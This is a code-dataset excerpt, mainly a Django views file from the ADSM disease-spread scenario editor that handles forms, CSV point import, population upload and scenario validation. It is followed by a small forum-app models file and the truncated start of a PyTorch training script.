ProductionType.objects.filter(protocolassignment__isnull=True)\n ProtocolSet = modelformset_factory(ProtocolAssignment, extra=len(missing), form=ProtocolAssignmentForm)\n context = {'title': 'Assign a Control Protocol to each Production Type'}\n return populate_forms_matching_ProductionType(ProtocolSet, ProtocolAssignment, context, missing, request,\n template='ScenarioCreator/MainPanel.html',\n html='ScenarioCreator/FormSet.html')\n\n\ndef assign_progressions(request):\n \"\"\"FormSet is pre-populated with existing assignments and it detects and fills in missing\n assignments with a blank form with production type filled in.\"\"\"\n initialize_spread_assignments()\n missing = ProductionType.objects.filter(diseaseprogressionassignment__isnull=True)\n ProgressionSet = modelformset_factory(DiseaseProgressionAssignment,\n extra=len(missing),\n form=DiseaseProgressionAssignmentForm)\n context = {'title': 'Assign Disease Progressions'}\n return populate_forms_matching_ProductionType(ProgressionSet, DiseaseProgressionAssignment, context, missing, request,\n template='ScenarioCreator/MainPanel.html')\n\n\ndef protocols_json(request):\n data = []\n for protocol in ControlProtocol.objects.all():\n entry = {'name': str(protocol.name),\n 'pk': protocol.id,\n 'tabs': [\n {'name':'Detection', 'can_select': True, 'enabled':bool(protocol.use_detection), 'field':'use_detection', 'valid': protocol.tab_is_valid('use_detection')},\n {'name':'Tracing', 'can_select': True, 'enabled':bool(protocol.use_tracing), 'field':'use_tracing', 'valid': protocol.tab_is_valid('use_tracing')},\n {'name':'Testing', 'can_select': True, 'enabled':bool(protocol.use_testing), 'field':'use_testing', 'valid': protocol.tab_is_valid('use_testing')},\n {'name':'Exams', 'can_select': True, 'enabled':bool(protocol.use_exams), 'field':'use_exams', 'valid': protocol.tab_is_valid('use_exams')},\n {'name':'Destruction', 'can_select': True, 'enabled':bool(protocol.use_destruction), 'field':'use_destruction', 'valid': protocol.tab_is_valid(\n 'use_destruction')},\n {'name':'Vaccination', 'can_select': False, 'enabled':bool(vaccination_trigger_in_use(protocol)), 'field':'use_vaccination', 'valid': protocol.tab_is_valid(\n 'use_vaccination')},\n {'name':'Cost Accounting', 'can_select': True, 'enabled':bool(protocol.use_cost_accounting), 'field':'use_cost_accounting', 'valid': protocol.tab_is_valid(\n 'use_cost_accounting')},\n ]}\n data.append(entry)\n return JsonResponse(data, safe=False)\n\n\ndef update_protocol_enabled(request, primary_key, field):\n \"\"\"Does nothing but save the `field` value to the database. Ex: use_detection use_tracing use_destruction\n use_vaccination use_exams use_testing use_cost_accounting\"\"\"\n #data = json.loads(request.POST.content.decode())\n value = request.POST.get('value') == 'true' #False otherwise\n ControlProtocol.objects.filter(id=int(primary_key)).update(**{field: value}) # specifically the value of field, not the word 'field'\n return JsonResponse({})\n\ndef collect_backlinks(model_instance):\n \"\"\":param model_instance: Django Model Instance\n :return: A dict of Models that reference the current\n Useful for determining if an instance can be deleted. Includes hyperlinks to the related models\n \"\"\"\n from django.contrib.admin.utils import NestedObjects\n collector = NestedObjects(using='scenario_db') # or specific database\n collector.collect([model_instance]) # https://docs.djangoproject.com/en/1.7/releases/1.7/#remove-and-clear-methods-of-related-managers\n dependants = collector.nested() # fun fact: spelling differs between America and Brittain\n #print(\"Found related models:\", dependants)\n links = {}\n if len(dependants[1:]):\n for direct_reference in dependants[1:][0]: # only iterates over the top level\n if not isinstance(direct_reference, list) and not isinstance(direct_reference, RelationalPoint): # Points are obvious, don't include them\n name = direct_reference.__class__.__name__\n try: # not everything has a name attr\n links[str(direct_reference)] = '/setup/%s/%i/' % (name, direct_reference.pk)\n except:\n links['%s:%i' % (name, direct_reference.pk)] = '/setup/%s/%i/' % (name, direct_reference.pk)\n #print(links)\n return links\n\n\ndef initialize_relational_form(context, primary_key, request):\n if not primary_key or primary_key == 'new':\n model = RelationalFunction()\n main_form = RelationalFunctionForm(request.POST or None)\n else:\n model = RelationalFunction.objects.get(id=primary_key)\n main_form = RelationalFunctionForm(request.POST or None, instance=model)\n context['model_link'] = '/setup/RelationalFunction/' + primary_key + '/'\n context['backlinks'] = collect_backlinks(model)\n context['deletable'] = context['model_link'] + 'delete/'\n context['form'] = main_form\n context['model'] = model\n return context\n\ndef export_functions(request, block):\n '''\n \"Functions\" as in relational functions and probability density functions.\n\n Exports to a single file, delimited by \"REL_\" for relational functions and \"PDF_\" for probability density functions.\n Files are saved in the same folder as the .db for each scenario. Exporting the same scenario multiple times overwrites\n the existing file.\n :param block: \"rel\" or \"pdf\" to determine which export to run.\n :return: Redirect to the scenario description.\n '''\n if block == \"rel\":\n # get the relational function model\n relfunction_model = globals()[\"RelationalFunction\"]\n # get all of the relational functions\n relfunction_objects = relfunction_model.objects.all()\n # get the relational function points model\n relpoints_model = globals()[\"RelationalPoint\"]\n # get all of the relational points\n relpoints_objects = relpoints_model.objects.all()\n # export the relational functions, export_relational_functions() is located in exporter.py\n export_relational_functions(relfunction_objects, relpoints_objects)\n pass\n elif block == \"pdf\":\n # get the pdf model\n pdf_model = globals()[\"ProbabilityDensityFunction\"]\n # get all of the pdfs\n pdf_objects = pdf_model.objects.all()\n # export the pdfs, export_pdfs() is located in exporter.py\n export_pdfs(pdf_objects)\n return redirect(\"/setup/Scenario/1/\")\n\ndef import_functions(request, block):\n '''\n \"Functions\" as in relational functions and probability density functions.\n\n Imports from all files located in the same location as the .db for each scenario that are delimited by \"PDF_\" for\n Probability Density Functions or \"REL_\" for relational functions. Will not import functions from files that include\n the current scenarios name.\n\n :param block: \"rel\" or \"pdf\" to determine which export to run.\n :return: Redirect to the scenario description.\n '''\n if block == \"rel\":\n # get the relational function model\n relfunction_model = globals()[\"RelationalFunction\"]\n # get all the existing relational functions\n relfunction_objects = relfunction_model.objects.all()\n # import new relational functions, import_relational_functions() is located in importer.py\n import_relational_functions(relfunction_objects)\n elif block == \"pdf\":\n # get the pdf model\n pdf_model = globals()[\"ProbabilityDensityFunction\"]\n # get all of the existing pdfs\n pdf_objects = pdf_model.objects.all()\n # import new pdfs, import_pdfs() is located in importer.py\n import_pdfs(pdf_objects)\n return redirect(\"/setup/Scenario/1/\")\n\ndef deepcopy_points(request, primary_key, created_instance):\n queryset = RelationalPoint.objects.filter(relational_function_id=primary_key)\n for point in queryset: # iterating over points already in DB\n point = RelationalPoint(relational_function=created_instance, x=point.x, y=point.y) # copy with new parent\n point.save() # This assumes that things in the database are already valid, so doesn't call is_valid()\n queryset = RelationalPoint.objects.filter(relational_function_id=created_instance.id)\n formset = PointFormSet(queryset=queryset) # this queryset does not include anything the user typed in, during the copy operation\n # formset = PointFormSet(request.POST or None, instance=created_instance)\n return formset\n\n\ndef initialize_points_from_csv(request):\n \"\"\" Uses a file upload to create a series of points and add them to the request\n :param request: request that contains the file upload\n :return: request with initial_values set\n \"\"\"\n file_path = handle_file_upload(request, is_temp_file=True, overwrite_ok=True)\n with open(file_path) as csvfile:\n dialect = csv.Sniffer().sniff(csvfile.read(1024)) # is this necessary?\n csvfile.seek(0)\n header = csv.Sniffer().has_header(csvfile.read(1024))\n csvfile.seek(0)\n if header:\n header = None #DictReader will pull it off the first line\n else:\n header = ['x', 'y']\n reader = csv.DictReader(lowercase_header(csvfile), fieldnames=header, dialect=dialect)\n entries = [line for line in reader] # ordered list\n try:\n (float(entries[0]['x']), float(entries[0]['y'])) # the header sneaks in when there's a mix of float and int\n except ValueError:\n entries = entries[1:] # clip the header\n \n initial_values = {}\n for index, point in enumerate(entries):\n initial_values['relationalpoint_set-%i-id' % index] = ''\n initial_values['relationalpoint_set-%i-relational_function' % index] = ''\n initial_values['relationalpoint_set-%i-x' % index] = point['x'].strip()\n initial_values['relationalpoint_set-%i-y' % index] = point['y'].strip()\n initial_values['relationalpoint_set-%i-DELETE' % index] = '' # these could be set to delete by the js\n initial_values['relationalpoint_set-TOTAL_FORMS'] = str(len(entries))\n initial_values['relationalpoint_set-INITIAL_FORMS'] = '0'\n initial_values['relationalpoint_set-MAX_NUM_FORMS'] = '1000'\n request.POST.update(initial_values)\n return request\n\n\ndef relational_function(request, primary_key=None, doCopy=False):\n \"\"\"This handles the edge case of saving, copying, and creating Relational Functions. RFs are different from any\n other model in ADSM in that they have a list of RelationalPoints. These points are listed alongside the normal form.\n Rendering this page means render a form, then a formset of points. Saving is more complex because the points also\n foreignkey back to the RelationalFunction which must be created before it can be referenced.\n\n It is possible to integrate this code back into the standard new / edit / copy views by checking for\n context['formset']. The extra logic for formsets could be kicked in only when one or more formsets are present. At\n the moment integration looks like a bad idea because it would mangle the happy path for the sake of one edge case.\n :param request:\n :param primary_key: None or a number if editing\n :param doCopy: copying will clear old primary keys so django will create new entries\"\"\"\n context = initialize_relational_form({}, primary_key, request)\n context['action'] = request.path\n if 'file' in request.FILES: # data file is present\n request = initialize_points_from_csv(request)\n if context['form'].is_valid():\n created_instance = None\n if doCopy:\n created_instance = context['form'].instance\n created_instance.pk = None # This will cause a new instance to be created\n created_instance.save()\n context['formset'] = PointFormSet(request.POST or None, instance=created_instance)\n else:\n created_instance = context['form'].instance\n created_instance.save()\n context['formset'] = PointFormSet(request.POST or None, instance=created_instance)\n\n context['action'] = '/setup/RelationalFunction/%i/' % created_instance.id\n\n if created_instance:\n if context['formset'].is_valid(): # We need to run this to ensure that the data in the formset is populated\n pass\n if doCopy:\n # If the user clicked the +f() Variant button, then all of the rows that have data filled in will count\n # as changed. The points started as exact copies of the points from another relational function, so we\n # need to (1) erase their primary keys so they count as new objects, and (2) make this new relational\n # function their parent.\n for point in context['formset'].forms:\n if point.changed_data:\n point.instance.pk = None\n point.instance.relational_function = created_instance\n point.instance.save()\n else:\n # If the user clicked the Overwrite button, all we want is a delete() on any points for which the\n # Delete checkbox was checked, and a save() on any points that have changed.\n for point in context['formset'].forms:\n if point.changed_data:\n if point.cleaned_data['DELETE']:\n point.instance.delete()\n else:\n point.instance.save()\n return HttpResponseRedirect(context['action'])\n else:\n context['formset'] = PointFormSet(request.POST or None, instance=context['model'])\n\n context['title'] = \"Create a Relational Function\"\n add_breadcrumb_context(context, \"RelationalFunction\")\n return render(request, 'ScenarioCreator/RelationalFunction.html', context)\n\n\ndef save_new_instance(initialized_form, request, context):\n model_instance = initialized_form.save() # write to database\n model_name = model_instance.__class__.__name__\n context['model_name'] = model_name\n if model_name in singletons: #they could have their own special page: e.g. Population\n return redirect('/setup/%s/1/' % model_name)\n if request.is_ajax():\n return HttpResponseRedirect('/setup/%s/%s' % (model_name, model_instance.id))\n return render(request, 'ScenarioCreator/crispy-model-form.html', context)\n\n\ndef new_form(request, initialized_form, context):\n if initialized_form.is_valid():\n model_instance = initialized_form.save() # write to database\n link = context['action'].split('/')\n context['action'] = '/' + '/'.join([link[1], link[2], str(model_instance.id)]) + '/' # not new if it has an id \n model_name, model = get_model_name_and_model(request)\n context['model_name'] = model_name\n if model_name in singletons: # they could have their own special page: e.g. Population\n context['base_page'] = 'ScenarioCreator/Crispy-Singleton-Form.html'\n # #422 Singleton models now load in a fragment to be refreshed the same way that other forms\n # are loaded dynamically\n return render(request, 'ScenarioCreator/MainPanel.html', context)\n if model_name == 'ProbabilityDensityFunction':\n return render(request, 'ScenarioCreator/ProbabilityDensityFunctionForm.html', context)\n return render(request, 'ScenarioCreator/crispy-model-form.html', context) # render in validation error messages\n\n\ndef get_model_name_and_form(request):\n model_name = re.split('\\W+', request.path)[2] # Second word in the URL\n form = globals()[model_name + 'Form'] # IMPORTANT: depends on naming convention\n return model_name, form\n\n\ndef get_model_name_and_model(request):\n \"\"\"A slight variation on get_mode_name_and_form useful for cases where you don't want a form\"\"\"\n model_name = re.split('\\W+', request.path)[2] # Second word in the URL\n model = globals()[model_name] # IMPORTANT: depends on import *\n return model_name, model\n\n\ndef initialize_from_existing_model(primary_key, request):\n \"\"\"Raises an ObjectDoesNotExist exception when the primary_key is invalid\"\"\"\n model_name, form_class = get_model_name_and_form(request)\n model = form_class.Meta.model.objects.get(id=primary_key) # may raise an exception\n initialized_form = form_class(request.POST or None, instance=model)\n return initialized_form, model_name\n\n\n'''New / Edit / Copy / Delete / List that are called from model generated URLs'''\ndef new_entry(request, second_try=False):\n try:\n model_name, form = get_model_name_and_form(request)\n model_name, model = get_model_name_and_model(request)\n if model_name == 'RelationalFunction':\n return relational_function(request)\n if model_name in singletons and model.objects.count():\n return edit_entry(request, 1)\n initialized_form = form(request.POST or None)\n context = {'form': initialized_form,\n 'title': \"Create a new \" + spaces_for_camel_case(model_name),\n 'action': request.path,\n 'new_form': True}\n add_breadcrumb_context(context, model_name)\n return new_form(request, initialized_form, context)\n except OperationalError:\n if not second_try:\n graceful_startup()\n return new_entry(request, True)\n return new_form(request, initialized_form, context)\n\n\ndef edit_entry(request, primary_key):\n model_name, form = get_model_name_and_form(request)\n if model_name == 'RelationalFunction':\n return relational_function(request, primary_key)\n\n try:\n initialized_form, model_name = initialize_from_existing_model(primary_key, request)\n except (ObjectDoesNotExist, OperationalError):\n request.path = '/setup/%s/new/' % model_name\n return new_entry(request)\n context = {'form': initialized_form,\n 'title': str(initialized_form.instance),\n 'action': request.path}\n add_breadcrumb_context(context, model_name, primary_key)\n\n if model_name == 'ProbabilityDensityFunction':\n context['backlinks'] = collect_backlinks(initialized_form.instance)\n context['deletable'] = '/setup/ProbabilityDensityFunction/%s/delete/' % primary_key\n\n if hasattr(initialized_form, 'soft_clean'):\n initialized_form.soft_clean(request.method)\n\n return new_form(request, initialized_form, context)\n\n\ndef copy_entry(request, primary_key):\n model_name, form = get_model_name_and_form(request)\n if model_name == 'RelationalFunction':\n return relational_function(request, primary_key, doCopy=True)\n try:\n initialized_form, model_name = initialize_from_existing_model(primary_key, request)\n if 'name' in initialized_form:\n initialized_form.initial['name'] += \" - Copy\"\n except ObjectDoesNotExist:\n return redirect('/setup/%s/new/' % model_name)\n context = {'form': initialized_form, \n 'title': \"Copy a \" + spaces_for_camel_case(model_name), \n 'action': request.path, \n 'model_name': model_name}\n if initialized_form.is_valid() and request.method == 'POST':\n initialized_form.instance.pk = None # This will cause a new instance to be created\n return save_new_instance(initialized_form, request, context)\n return render(request, 'ScenarioCreator/crispy-model-form.html', context)\n\n\ndef delete_entry(request, primary_key):\n model_name, model = get_model_name_and_model(request)\n model.objects.get(pk=primary_key).delete()\n unsaved_changes(True)\n if model_name not in singletons:\n return redirect('/setup/%s/' % model_name) # model list\n else:\n if model_name == \"Population\":\n print(\"Deleting Population Dependant Models.\")\n\n try:\n VaccinationRingRuleModel = globals()[\"VaccinationRingRule\"]\n VaccinationRingRuleModel.objects.get(pk=1).delete()\n except VaccinationRingRule.DoesNotExist:\n pass\n\n try:\n VaccinationGlobalModel = globals()[\"VaccinationGlobal\"]\n VaccinationGlobalModel.objects.get(pk=1).delete()\n except VaccinationGlobal.DoesNotExist:\n pass\n\n try:\n DiseaseDetectionModel = globals()[\"DiseaseDetection\"]\n DiseaseDetectionObjects = DiseaseDetectionModel.objects.all()\n for DiseaseDetectionObject in DiseaseDetectionObjects:\n DiseaseDetectionObject.delete()\n except DiseaseDetection.DoesNotExist:\n pass\n\n try:\n StopVaccinationModel = globals()[\"StopVaccination\"]\n StopVaccinationObjects = StopVaccinationModel.objects.all()\n for StopVaccinationObject in StopVaccinationObjects:\n StopVaccination.delete()\n except StopVaccination.DoesNotExist:\n pass\n\n print(\"Population Deletion Complete. Redirecting...\")\n return redirect('/setup/%s/new/' % model_name) # Population can be deleted, maybe others\n\n\ndef promote_to_abstract_parent(model_name):\n for key, value in abstract_models.items(): # fix for child models (DirectSpread, RelationalFunction) returning to the wrong place\n if model_name in [x[0] for x in value]:\n model_name = key\n return model_name\n\n\ndef trigger_list(request):\n layout = {\n 'Start Triggers':\n [DiseaseDetection,\n RateOfNewDetections,\n DisseminationRate,\n SpreadBetweenGroups,\n TimeFromFirstDetection,\n DestructionWaitTime],\n 'Stop Triggers':\n [StopVaccination],\n 'Restart Triggers': #Duplicate list from above because of filtering\n [DiseaseDetection,\n RateOfNewDetections,\n DisseminationRate,\n SpreadBetweenGroups,\n TimeFromFirstDetection,\n DestructionWaitTime],\n }\n context = {'title': \"Vaccination Triggers\", \n 'base_page': 'ScenarioCreator/VaccinationTriggerList.html',\n 'categories': [{'name':'Start Triggers',\n 'models':[filtered_list_per_model(x, False) for x in layout['Start Triggers']]\n }, \n {'name':'Stop Triggers',\n 'models':[list_per_model(x) for x in layout['Stop Triggers']]\n },\n {'name':'Restart Triggers', # This exact name is used in the template VaccinationTriggerList.html\n 'models':[filtered_list_per_model(x, True) for x in layout['Restart Triggers']]\n }\n ]\n }\n \n return context\n\n\ndef vaccination_trigger_in_use(protocol):\n vaccination_triggers = trigger_list({})\n\n for category in vaccination_triggers['categories']:\n if category['name'] == \"Start Triggers\":\n for model in category['models']:\n if model['entries'] and len(model['entries']) > 0:\n if not protocol.use_vaccination:\n protocol.use_vaccination = True\n protocol.save()\n return True\n\n if protocol.use_vaccination:\n protocol.use_vaccination = False\n protocol.save()\n return False\n\n\ndef filtered_list_per_model(model_class, restart_trigger):\n model_name = model_class.__name__\n context = {'entries': model_class.objects.filter(restart_only=restart_trigger),\n 'class': model_name,\n 'name': spaces_for_camel_case(model_name)}\n return context\n\n\n\ndef list_per_model(model_class):\n model_name = model_class.__name__\n context = {'entries': model_class.objects.all(),\n 'class': model_name,\n 'name': spaces_for_camel_case(model_name),\n 'wiki_link': getattr(model_class, 'wiki_link', None)}\n return context\n\ndef functions_panel(request, form=None):\n \"\"\"Panel on the right that lists both Relational and Probability Functions with a graphic depiction\"\"\"\n context = {'models': [],\n 'load_target': '#current-function',\n }\n if form is not None:\n context['form'] = form\n for local_name, local_model in abstract_models['Function']:\n context['models'].append(list_per_model(local_model))\n return render(request, 'functions_panel.html', context) # no 3 panel layout\n\ndef export_relational_graph(request):\n\n # get the graph src, this looks a lot like a url. This is only used to extract the private key of the graph from\n graph_src = str(request.GET.get('graph_src', None))\n # extract said private key. This is used as a unique identifier for each function\n graph_pk = int(''.join(char for char in graph_src if char.isdigit()))\n\n # get the object itself. This will actually only be used to get the exact name of the function\n rel_graph = ScenarioCreator.models.RelationalFunction.objects.get(pk=graph_pk)\n\n # get the graph object, this comes back as an HttpResponse, but the image is in HttpResponse.content as bytes\n graph = function_graphs.existing_relational_graph(graph_pk)\n\n # ensure that the path will exist\n if not os.path.exists(workspace_path(scenario_filename() + \"/Supplemental Output Files\")):\n os.mkdir(workspace_path(scenario_filename() + \"/Supplemental Output Files\"))\n if not os.path.exists(workspace_path(scenario_filename() + \"/Supplemental Output Files/Relational Function Graphs\")):\n os.mkdir(workspace_path(scenario_filename() + \"/Supplemental Output Files/Relational Function Graphs\"))\n\n # write the image to file.\n with open(workspace_path(scenario_filename() + \"/Supplemental Output Files/Relational Function Graphs/\" + rel_graph.name + \".png\"), \"wb\") as image_file:\n image_file.write(graph.content)\n\n # blank response - nothing happens on the front end.\n return JsonResponse({})\n\ndef export_pdf_graph(request):\n\n # get the graph src, this looks a lot like a url. This is only used to extract the private key of the graph from\n graph_src = str(request.GET.get('graph_src', None))\n # extract said private key. This is used as a unique identifier for each function\n graph_pk = int(''.join(char for char in graph_src if char.isdigit()))\n\n # get the object itself. This will actually only be used to get the exact name of the function\n pdf_graph = ScenarioCreator.models.ProbabilityDensityFunction.objects.get(pk=graph_pk)\n\n # get the graph object, this comes back as an HttpResponse, but the image is in HttpResponse.content as bytes\n graph = function_graphs.existing_probability_graph(graph_pk)\n\n # ensure that the path will exist\n if not os.path.exists(workspace_path(scenario_filename() + \"/Supplemental Output Files\")):\n os.mkdir(workspace_path(scenario_filename() + \"/Supplemental Output Files\"))\n if not os.path.exists(workspace_path(scenario_filename() + \"/Supplemental Output Files/PDF Graphs\")):\n os.mkdir(workspace_path(scenario_filename() + \"/Supplemental Output Files/PDF Graphs\"))\n\n # write the image to file\n with open(workspace_path(scenario_filename() + \"/Supplemental Output Files/PDF Graphs/\" + pdf_graph.name + \".png\"), \"wb\") as image_file:\n image_file.write(graph.content)\n\n # blank response - nothing happens on the front end.\n return JsonResponse({})\n\ndef control_protocol_list(request):\n return model_list(request, 'ScenarioCreator/ControlProtocolList.html')\n\n\ndef model_list(request, base_page='ScenarioCreator/ModelList.html'):\n model_name, model = get_model_name_and_model(request)\n model_name = promote_to_abstract_parent(model_name)\n if model_name in 'Function RelationalFunction ProbabilityDensityFunction'.split():\n return functions_panel(request)\n if model_name == 'VaccinationTrigger': # special case\n context = trigger_list(request)\n else:\n context = {'title': \"Create \" + spaces_for_camel_case(model_name) + \"s\",\n 'base_page': base_page,\n 'models': []}\n if model_name in abstract_models.keys():\n for local_name, local_model in abstract_models[model_name]:\n context['models'].append(list_per_model(local_model))\n else:\n context['models'].append(list_per_model(model))\n context['load_target'] = '#center-panel'\n context['load_next'] = request.GET.get('next', '') # #704 Ability to load the center panel URL with a ?next=/setup/DirectSpread/1/ argument\n return render(request, 'ScenarioCreator/3Panels.html', context)\n\n# Utility Views was moved to the ADSMSettings/connection_handler.py\n\ndef open_population(request, target):\n from ADSMSettings.models import SmSession\n session = SmSession.objects.get()\n session.set_population_upload_status(\"Processing file\")\n\n return parse_population(workspace_path(target), session)\n\n\ndef upload_population(request):\n from ADSMSettings.models import SmSession\n session = SmSession.objects.get()\n if 'GET' in request.method:\n json_response = {\"status\": session.population_upload_status, \"percent\": session.population_upload_percent*100} \n return JsonResponse(json_response)\n\n session.set_population_upload_status(\"Processing file\")\n if 'filename' in request.POST:\n file_path = workspace_path(request.POST.get('filename')) \n else:\n try:\n file_path = handle_file_upload(request, is_temp_file=True, overwrite_ok=True)\n except FileExistsError:\n return JsonResponse({\"status\": \"failed\", \n \"message\": \"Cannot import file because a file with the same name already exists in the list below.\"})\n\n return parse_population(file_path, session)\n\n\ndef parse_population(file_path, session):\n from xml.etree.ElementTree import ParseError\n try:\n model = Population(source_file=file_path)\n model.save()\n except (EOFError, ParseError, BaseException) as error:\n session.set_population_upload_status(status='Failed: %s' % error)\n message = \"This is not a valid Population file: \" if isinstance(error, ParseError) else \"\"\n return JsonResponse({\"status\": \"failed\", \"message\": message + str(error)}) # make sure to cast errors to string first\n # wait for Population parsing (up to 5 minutes)\n session.reset_population_upload_status()\n convert_user_notes_to_unit_id()\n return JsonResponse({\"status\": \"complete\", \"redirect\": \"/setup/Populations/\"})\n\ndef export_population(request, format):\n parser = ScenarioCreator.population_parser.ExportPopulation(format)\n parser.export()\n return redirect(\"/setup/Populations/\")\n\n\ndef filtering_params(request):\n \"\"\"Collects the list of parameters to filter by. Because of the way this is setup:\n 1) Only keys mentioned in this list will be used (security, functionality).\n 2) Only one filter for each choice key can be used (e.g. only one production_type__name)\"\"\"\n params = {}\n keys = ['latitude__gte', 'latitude__eq', 'latitude__lte', 'longitude__gte', 'longitude__eq',\n 'longitude__lte', 'initial_size__gte', 'initial_size__eq', 'initial_size__lte', # 3 permutations for each number field\n 'production_type__name', 'initial_state']\n if request:\n for key in keys:\n if key in request.GET:\n params[key] = request.GET.get(key)\n return params\n\n\ndef filter_info(request, params):\n \"\"\"Provides the information necessary for Javascript to fully construct a set of filters for Population\"\"\"\n info = {}\n # each select option\n info['select_fields'] = {'production_type__name': [x.name for x in ProductionType.objects.all()],\n 'initial_state': Unit.initial_state_choices}\n info['numeric_fields'] = [\"latitude\",\"longitude\", \"initial_size\"]\n info['remaining_filters'] = [x for x in info['select_fields'] if x not in params.keys()]\n return info\n\n\ndef population(request):\n \"\"\"\"Creates the formset and filter context for Population View\"\"\"\n context = {}\n FarmSet = modelformset_factory(Unit, extra=0, form=UnitFormAbbreviated, can_delete=False)\n if save_formset_succeeded(FarmSet, Unit, context, request):\n return redirect(request.path)\n if Population.objects.filter(id=1, ).exists():\n\n if not Unit.objects.count(): # #571 no units were imported: error, blank files\n Population.objects.all().delete()\n return population(request) # delete blank and try again\n\n sort_type = request.GET.get('sort_by', 'initial_state')\n query_filter = Q()\n params = filtering_params(request)\n for key, value in params.items(): # loops through params and stacks filters in an AND fashion\n query_filter = query_filter & Q(**{key: value})\n\n initialized_formset = FarmSet(queryset=Unit.objects.filter(query_filter).order_by(sort_type)[:100])\n context['formset'] = initialized_formset\n context['filter_info'] = filter_info(request, params)\n context['deletable'] = '/setup/Population/1/delete/'\n context['editable'] = request.GET.get('readonly', 'editable')\n context['population_file'] = os.path.basename(Population.objects.get().source_file)\n context['Population'] = Unit.objects.count()\n context['Farms'] = Unit.objects.count()\n else:\n context['xml_files'] = file_list([\".xml\", \".csv\"])\n return render(request, 'ScenarioCreator/Population.html', context)\n\n\ndef validate_scenario(request):\n\n # ensure that the destruction_reason_order includes all elements. See #990 for more details\n dg = DestructionGlobal.objects.all().first()\n if dg:\n DestructionGlobal.objects.filter(pk=1).update(destruction_reason_order=match_data(dg.destruction_reason_order, \"Basic, Trace fwd direct, Trace fwd indirect, Trace back direct, Trace back indirect, Ring\"))\n\n simulation = subprocess.Popen(adsm_executable_command() + ['--dry-run'],\n shell=(platform.system() != 'Darwin'),\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = simulation.communicate() # still running while we work on python validation\n \n simulation.wait() # simulation will process db then exit\n print(\"C Engine Exit Code:\", simulation.returncode)\n context = {'dry_run_passed': simulation.returncode == 0 and not stderr,\n 'sim_output': stdout.decode() + stderr.decode(),\n 'whole_scenario_warnings': whole_scenario_validation(),\n 'base_page': 'ScenarioCreator/Validation.html'}\n return render(request, 'ScenarioCreator/MainPanel.html', context)\n\n\ndef vaccination_global(request):\n instance = VaccinationGlobal.objects.get()\n initialized_form = VaccinationMasterForm(request.POST or None, instance=instance)\n if request.method == \"POST\":\n if initialized_form.is_valid():\n instance = initialized_form.save(commit=True)\n context = {\n 'title': 'Vaccination Global',\n 'ordering': json.loads(instance.vaccination_priority_order, object_pairs_hook=OrderedDict),\n 'form': initialized_form\n }\n\n return render(request, 'ScenarioCreator/VaccinationGlobal.html', context)\n\n\ndef destruction_global(request):\n\n instance = DestructionGlobal.objects.get()\n initialized_form = DestructionMasterForm(request.POST or None, instance=instance)\n if request.method == \"POST\":\n if initialized_form.is_valid():\n instance = initialized_form.save(commit=True)\n\n context = {\n 'title': 'Destruction Global',\n 'reasons': match_data(instance.destruction_reason_order, \"Basic, Trace fwd direct, Trace fwd indirect, Trace back direct, Trace back indirect, Ring\").split(\",\"),\n 'priorities': instance.destruction_priority_order.split(\",\"),\n 'form': initialized_form,\n }\n '''\n #Destruction Priority Secondary Priority\n 'priorities': json.loads(json.dumps(match_data(str(instance.destruction_priority_order), '{\"Days Holding\":[\"Oldest\", \"Newest\"], \"Production Type\":[], \"Size\":[\"Largest\", \"Smallest\"]}')), object_pairs_hook=OrderedDict),\n '''\n\n return render(request, 'ScenarioCreator/DestructionGlobal.html', context)\n\n\ndef match_data(current, all_data):\n\n def try_dict(current_dict, all_data_dict):\n if \"{\" in current_dict and \"{\" in all_data_dict:\n try:\n try:\n all_data_dict = json.loads(all_data_dict, object_pairs_hook=OrderedDict)\n except ValueError:\n return None\n except SyntaxError:\n return current_dict\n try:\n current_dict = json.loads(current_dict, object_pairs_hook=OrderedDict)\n except ValueError:\n return None\n except SyntaxError:\n return all_data_dict\n if isinstance(current_dict, dict):\n for key in all_data_dict:\n current_dict.setdefault(key, all_data_dict[key])\n return current_dict\n except ValueError:\n return None\n\n dict_return = try_dict(current, all_data)\n if dict_return is not None:\n return dict_return\n\n was_string = False\n if isinstance(current, str):\n was_string = True\n current = current.replace(\", \", \",\").split(\",\")\n all_data = all_data.replace(\", \", \",\").split(\",\")\n\n for element in all_data:\n if element not in current:\n current.append(element)\n for element in current:\n if element not in all_data:\n current.remove(element)\n\n if was_string:\n current = \",\".join(current)\n\n return current\n","repo_name":"NAVADMC/ADSM","sub_path":"ScenarioCreator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":51536,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"33951320214","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nclass UserLogin(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n gender = models.CharField(max_length=10, default=\"\")\n datetime = models.DateTimeField(auto_now_add=True)\n is_active = models.BooleanField(default=True)\n mobile = models.CharField(max_length=100, default='')\n profession = models.CharField(max_length=100, default=\"\")\n field = models.CharField(max_length=100, default='')\n bio = models.TextField(max_length=1000, default=\"Create your Community\") # Changed from TimeField to TextField\n profile = models.ImageField(null=True, default='static/download.jpeg', upload_to='static/') # Removed the comma after upload_to\n\n def __str__(self):\n return f\"{self.user.first_name} {self.user.last_name}\"\n\nclass postUser(models.Model):\n creator = models.ForeignKey(User, on_delete=models.CASCADE)\n threads = models.CharField(max_length=100)\n descriptions = models.TextField(max_length=100)\n groupMembers = models.IntegerField(default = 1)\n timeCreated = models.DateTimeField(auto_now=True)\n def __str__(self):\n return f\"{self.threads}\"\n\nclass Discussion(models.Model):\n thread = models.ForeignKey(postUser, on_delete=models.CASCADE)\n comments = models.TextField(max_length=100000)\n writers = models.ForeignKey(User, on_delete=models.CASCADE)\n images = models.ImageField(null=True, blank=True ,upload_to='static/')\n def __str__(self):\n return f\"{self.thread}\"\nclass other(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n name = models.CharField(max_length = 100)\n","repo_name":"tolossamuel/hackatonsBIT","sub_path":"students/community/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29049922245","text":"import torch\nimport torch.nn.functional as F\n\nimport os\nfrom utils import AverageMeter, calculate_accuracy, calculate_class_num, save_checkpoint\nfrom plot_results import plot_confusion_matrix, plot_roc_curve\n\n\ndef train(model, criterion, optimizer, scheduler, train_loader, test_loader, num_epochs, device, cfg, label_dict):\n\n best_test_acc = 0\n best_epoch = 0\n\n for epoch in range(1, 